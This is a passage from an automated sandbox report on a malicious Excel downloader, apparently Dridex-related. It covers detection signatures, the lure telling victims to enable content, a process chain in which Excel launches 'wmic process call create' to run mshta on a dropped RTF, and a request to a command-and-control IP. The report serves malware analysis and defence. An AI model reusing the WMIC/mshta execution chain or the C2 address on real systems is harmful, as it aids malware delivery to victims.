      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://web.microsoftstream.com/video/$
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://webshell.suite.office.comOCSettingsCloudPolicyServiceAndroidUrlhttps://clients.config.office
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://wus2.contentsync.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261257878.0000000015A65000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://wus2.pagecontentsync.
      Source: EXCEL.EXE, 00000000.00000003.263363412.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350133174.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397386669.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383712060.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459326223.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463180999.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460536369.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262945436.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396836402.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543940616.0000000013175000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msm
      Source: global trafficHTTP traffic detected: GET /6tfcnfucknugget4gpenis3dade5z6cpc HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: rapeHost: 149.129.254.152:8080

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\tCeltZ.rtf, type: DROPPED

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing" and "Enable Content" to display. 0 3 Data peraeaeoeeaoei: paIUO uaiee aanoaiue o
      Source: Screenshot number: 4Screenshot OCR: Enable Content" to display. 0 3 Data peraeaeoeeaoei: paIUO uaiee aanoaiue oIue'luujiod notr Serv
      Source: Screenshot number: 8Screenshot OCR: Enable Editing" and "Enable Content" to display. 3 Data paIUO uaiee aanoaiue oIue'luujiod notr S
      Source: Screenshot number: 8Screenshot OCR: Enable Content" to display. 3 Data paIUO uaiee aanoaiue oIue'luujiod notr Service issue 4 zIe 1
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: order 4544471372.xlsInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: order 4544471372.xlsInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: EXCEL.EXE, 00000000.00000002.542772455.00000000117E0000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\tCeltZ.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=4OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\TempUSERDOMAIN=RAYHIWGUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsx
      Found obfuscated Excel 4.0 MacroShow sources
      Source: order 4544471372.xlsMacro extractor: Sheet: Macro1 high usage of CHAR() function: 26
      Source: order 4544471372.xlsMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_130234FB0_3_130234FB
      Source: order 4544471372.xlsReversingLabs: Detection: 13%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\tCeltZ.rtf
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\tCeltZ.rtfJump to behavior
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_01
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{BFEB2554-F1FC-4B55-8EC7-29D40F128D11} - OProcSessId.datJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/8@0/1
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: order 4544471372.xlsInitial sample: OLE zip file path = xl/media/image1.png
      Source: order 4544471372.xlsInitial sample: OLE zip file path = docProps/custom.xml
      Source: FFC20000.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: cmd line: tceltz.rtfJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: cmd line: tceltz.rtfJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 5464Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_0F53FA58 sldt word ptr [eax]0_3_0F53FA58
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_0F542E4C rdtsc 0_3_0F542E4C
      Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.411702761.000000000F59E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349574960.000000000F536000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.411656756.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.414628702.000000000F59E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349641759.000000000F59E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.542025374.000000000F59E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.414512357.000000000F537000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541923673.000000000F537000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000003.469056454.000002170B64B000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000003.469008575.0000020F08951000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.538705158.000002170B64E000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534821002.0000020F08952000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469215918.000002170B653000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: EXCEL.EXE, 00000000.00000002.539215911.000000000D793000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWH
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\tCeltZ.rtfJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXECode function: 0_3_0F542E4C rdtsc 0_3_0F542E4C
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.536920215.0000000002DA0000.00000002.00020000.sdmp, mshta.exe, 0000001A.00000002.535628470.0000020F08D70000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
      Source: EXCEL.EXE, 00000000.00000002.536920215.0000000002DA0000.00000002.00020000.sdmp, mshta.exe, 0000001A.00000002.535628470.0000020F08D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.536920215.0000000002DA0000.00000002.00020000.sdmp, mshta.exe, 0000001A.00000002.535628470.0000020F08D70000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: EXCEL.EXE, 00000000.00000002.536920215.0000000002DA0000.00000002.00020000.sdmp, mshta.exe, 0000001A.00000002.535628470.0000020F08D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery11Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution22Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting3LSA SecretsSystem Information Discovery4SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      order 4544471372.xls13%ReversingLabsDocument-Excel.Trojan.Heuristic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://o365auditrealtimeingestion.manage.office.comBearer0%Avira URL Cloudsafe
      http://149.129.254.152:8080d-0%Avira URL Cloudsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize0%Avira URL Cloudsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      http://schemas.open0%URL Reputationsafe
      https://settings.outlook.comS0%Avira URL Cloudsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://o365auditrealtimeingestion.manage.office.com0f0%Avira URL Cloudsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer0%Avira URL Cloudsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://dataservice.o365filtering.comxiu0%Avira URL Cloudsafe
      http://149.129.254.15240%Avira URL Cloudsafe
      https://rpsticket.partnerservices.getmicrosoftkey.comBU0%Avira URL Cloudsafe
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://di.129.254.152:8080/0%Avira URL Cloudsafe
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gp0%Avira URL Cloudsafe
      https://cr.office.com~0%Avira URL Cloudsafe
      https://api.onedrive.comMBI0%Avira URL Cloudsafe
      https://substrate.office.coma0%Avira URL Cloudsafe
      http://149.129.254.ingsb60%Avira URL Cloudsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.0%Avira URL Cloudsafe
      https://substrate.office.comg0%Avira URL Cloudsafe
      https://substrate.office.comP0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3da0%Avira URL Cloudsafe
      https://substrate.office.comS0%Avira URL Cloudsafe
      https://devnull.onenote.comMBI_SSL_SHORT0%Avira URL Cloudsafe
      https://substrate.office.comW0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfc0%Avira URL Cloudsafe
      https://wus2.contentsync.0%URL Reputationsafe
      https://onedrive.live.comed0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dadV0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcfalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://shell.suite.office.com:1443EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
        high
        https://login.windows.net/common/oauth2/authorizedgREXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
          high
          https://autodiscover-s.outlook.com/EXCEL.EXE, 00000000.00000003.414564418.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.541998187.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.349622287.000000000F58E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
            high
            https://o365auditrealtimeingestion.manage.office.comBearerEXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
              high
              http://149.129.254.152:8080d-mshta.exe, 0000001A.00000002.534688222.0000020F08921000.00000004.00000020.sdmp, mshta.exe, 0000001A.00000003.469184261.0000020F08921000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oauEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                high
                https://cdn.entity.D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                • URL Reputation: safe
                unknown
